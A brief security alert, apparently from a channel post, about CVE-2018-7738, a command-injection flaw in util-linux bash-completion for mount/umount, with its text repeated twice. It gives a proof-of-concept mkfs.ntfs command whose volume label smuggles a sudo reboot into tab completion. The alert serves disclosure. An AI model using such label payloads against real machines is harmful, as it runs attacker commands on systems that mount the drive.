⚠ Malicious Command Execution via bash-completion (CVE-2018-7738) At minimum, affected versions: Ubuntu 18.04
This issue affects any system using the util-linux
mount/umount bash-completion scripts between version 2.24 and 2.31.
A series of bugs apply with specially formatted USB drive name, which on mount run code.
example:
sudo mkfs.ntfs -f -L 'IFS=,;a=sudo,reboot;\$a' /dev/sdb1
umount
(severity: 🔷 low) - requires physical access
More info: https://yt.gl/say6z
#alert #severityLow #local #bash
Discuss this at @itsectalk and let your Linux sysadmins know.
This issue affects any system using the util-linux
mount/umount bash-completion scripts between version 2.24 and 2.31.
A series of bugs apply with specially formatted USB drive name, which on mount run code.
example:
sudo mkfs.ntfs -f -L 'IFS=,;a=sudo,reboot;\$a' /dev/sdb1
umount
(severity: 🔷 low) - requires physical access
More info: https://yt.gl/say6z
#alert #severityLow #local #bash
Discuss this at @itsectalk and let your Linux sysadmins know.